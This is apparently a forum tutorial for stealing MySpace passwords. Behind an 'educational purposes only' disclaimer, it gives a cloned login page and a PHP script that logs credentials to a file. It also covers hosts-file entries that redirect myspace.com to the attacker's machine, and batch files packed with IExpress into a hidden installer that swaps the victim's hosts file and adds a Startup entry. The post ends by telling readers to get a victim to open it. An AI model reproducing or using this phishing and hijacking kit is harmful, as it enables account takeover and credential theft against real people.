This tutorial gives you the ABILITY to obtain myspace passwords..before i continue i must state that i have no intensions of using my knowledge to actually get myspace passwords AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me, im only posting this tut so myspace can get a fix on this problem..
now that i have my disclaimer up i will begin the tutorial.
a brief discription of this tutorial combines my and m00nbats ideas (yes moonbat, your host file thing is involved so props for that). this will require for the "Target" to click on an .exe and after that, everything will go the way you want it to be.
ok your going to need a few things.
*. a server (don't worry its not as scary as it sounds, i will "provide" one for you)
2. some batch file knowledge
*.some HTML knowledge
ok, to explain what we are going to do, we will basicly tell the computer that when you type in "myspace.com" it will take them to your phishing site of myspace.com VIA ip address thus the name "hijacking" comes to play. in order to do this we will have to replace their host file with your modified version. and to cover our *****s of us being in that computer, we will delete everything we have added/modified. now to begin
first off we need to have a phishing site for myspace, so lets go to myspace.com. right click the page (anywhere) and click view source. we should get a bunch of lovely html sooo assuming your in notepad (if not copy and paste the code to notepad) we go to edit then find and we type in the find box (dont forget the "<") it should take us to a nice little string
like so
Code:
<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
so now we edit the code so that everything that goes in the form, appears in our server (aka your computer)
Code:
<form action="login.php" method="get" id="LoginForm" name="aspnetForm">
after you edit this save it as index.html on to your desktop
you may be wondering what login.php is, well we have to create that. the php should just have this
Code:
<?php
header("Location: http://home*4.myspace.com/index.cfm?fuseaction=user");
$handle = fopen("out.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
all this does is it "retrieves" what ever things go in the html form you receive in a pretty out.txt and it also redirects them to the real site.
now that we have all of this set up, we begin to install our server. i personally use XAMPP just because i believe its pretty good and simple. you can get xampp [URL="http://www.apachefriends.org/en/xampp-windows.html"]HERE[/URL] and download the installer. make sure you select the three services when you install xampp =)
once youve done that just install everything and head to your installation directory (default is C:\xampp) once there go to htdocs and open up your internet browser.
in the address bar type in localhost and it should take you to a xampp page. if it doesn't then theres something wrong with your installation, if it does then delete everything in the htdocs and place index.html and login.php in the folder.
now re***** your web browser and you should see the magical myspace page, now just type anything in the username and password field and you should end up in the REAL myspace page. check your htdocs foder and there should be an out.txt with what you have put inside those field, this means IT WORKS so lets proceed on editing the host file in "C:\WINDOWS\system*2\drivers\etc" (etc is in fact a folder)
we now copy and paste it on to your desktop. close etc and open up notepad and open up the host file with notepad by just dragging and dropping the host file on to notepad. we should get something like this
Code:
# Copyright (c) ****-**** Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# *02.54.*4.*7 rhino.acme.com # source server
# *8.25.6*.*0 x.acme.com # x client host
*27.0.0.* localhost
we will now add your ip and besides it, put myspace.com as many ways as possible so it would look like
Code:
# Copyright (c) ****-**** Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# *02.54.*4.*7 rhino.acme.com # source server
# *8.25.6*.*0 x.acme.com # x client host
*27.0.0.* localhost
*2.*4.56.7 myspace.com
*2.*4.56.7 www.myspace.com
*2.*4.56.7 http://myspace.com
*2.*4.56.7 http://www.myspace.com
*2.*4.56.7 myspace
*2.*4.56.7 is your ip so if your ip address was 24.*0.78.7* then youd replace *2.*4.56.7 with 24.*0.78.7*. if you don't know what your ip address is, then goto whatismyip.com and it should tell you in big black letters what your ip address is. now save and exit the host file and open up notepad again. we will now inject notepad in to the target system so we will add this to our batch file
Code:
@echo off
DEL C:\WINDOWS\system*2\drivers\etc\host
MOVE "host" "C:\WINDOWS\system*2\drivers\etc"
MOVE "stop.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
save this as start.bat and make it into and exe using the bat to exe converter found [URL="http://www.all-nettools.com/forum/showthread.php?t=6*0*"]HERE[/URL] at the end of the page.
we will now create the "stop.exe" which really is stop.bat converted into an exe file
Code:
@echo off
DEL C:\WINDOWS\system*2\drivers\etc\host
DEL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\stop.exe
save it as stop.bat and convert it to exe.
now we should have
host
start.exe
stop.exe
now we go to start->run->iexpress
now create a new self extraction then click next
select extract and install (the first choice Buzzo) then next
give it a good looking tiltle then next
then no promt then next
no license..next
ah now we add our host, start.exe and stop.exe in to this wonderful white box and click next
on the box that says install program select start.exe then next, we don't need anything for the bottom
select hidden then next
no message, next
now check hide process animation from user and click browse to save it and give it a good name like above..next
no restart, next
don't save if you do then save i don't care, next
then create the file and now you should have the file finished..all you have to do is get your victim to open it, and everytime they go to myspace, it will show your servers page instead and when they type in anything in those username and password fields, it will go to your out.txt.
have fun!!!
keep in mind to always have your computer on or else your server wont work
REMEMBER THAT IF YOUR BEHIND A ROUTER, FORWARD PORT 80 TO YOUR COMPUTER!!!!!!!!!!!!!!!!!!!!!!!!